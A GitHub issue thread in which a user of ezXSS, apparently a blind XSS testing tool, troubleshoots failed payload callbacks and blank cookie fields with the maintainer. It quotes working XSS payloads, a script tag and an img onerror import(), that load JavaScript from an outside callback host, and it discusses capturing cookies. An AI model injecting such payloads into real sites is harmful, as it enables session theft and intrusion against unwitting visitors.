Issue with some payloads

Question

Issue with some payloads

luchua-bc opened this issue 9 months ago · 5 comments

I've upgraded to the latest version 4.2 and still noticed somehow some payloads don't work for me.

Basically I started an Apache2 server on another machine, edited its index.html page to include the payload, reloaded the page, then checked whether I received the access in "All Reports".

Somehow only access with the payload <script src=//www.myhost.com></script> was shown.

Other payloads such as img and svg don't work. For example,
"><img src onerror=import('//www.myhost.com')>. Although I can see requests to www.myhost.com in server access logs, those requests didn't trigger report creation.

Would you please advise on what could be wrong with my configuration and/or test? Thanks in advance for your help.

Answer 1 · 2024-04-15T01:01:55.000Z

Also I do have the following headers added through the .htaccess file

Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: origin, x-requested-with, content-type
Access-Control-Allow-Methods: GET, POST

Thanks.

Answer 2 · 2024-04-15T11:12:58.000Z

Can you provide me more information please?

Does the payload trigger and post to the /callback? What's the status code of the callback?

Could you check with a ez.pe subdomain if it works the same or not? I need to know if this problem is in your browser, some server settings or actually in ezXSS. As far as I know they should all work.

Also I do have the following headers added through the .htaccess file
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: origin, x-requested-with, content-type
Access-Control-Allow-Methods: GET, POST
Thanks.

You should not add these headers in the htaccess, since these are added by the code in 4.2. Adding this can actually break payloads.

Answer 3 · 2024-04-15T23:27:05.000Z

Thank @ssl a lot for the reply.

I did register an ez.pe subdomain before opening this issue and confirmed the same payload works there to rule out the possibility that the issue is caused by the ezXSS software or my browser. That is, it's related to my installation.

The issue was indeed caused by having those headers in the .htaccess file. After those headers were removed, the payload works like a charm.

However, I did notice in the report the Cookies textarea is blank for all my tests. Not sure whether the test pages I'm coming from don't have non-HTTP-only cookies or I need to do some configuration to have them show up. Please advise.

Cheers,
Luc

Answer 4 · 2024-04-18T13:03:33.000Z

The issue was indeed caused by having those headers in the .htaccess file. After those headers were removed, the payload works like a charm.

Great!

However, I did notice in the report the Cookies textarea is blank for all my tests. Not sure whether the test pages I'm coming from don't have non-HTTP-only cookies or I need to do some configuration to have them show up. Please advise.

Pretty sure the cookies have a HTTP-only flag, which javascript is unable to read.

You can test your payload by visiting /assets/payload-tester.html on your host. This will generate a report including cookies.

Answer 5 · 2024-04-19T17:55:00.000Z

Thank @ssl for the response. Actually I created an HTML page that generates a cookie in it but still got the same issue. I will submit a new issue for it.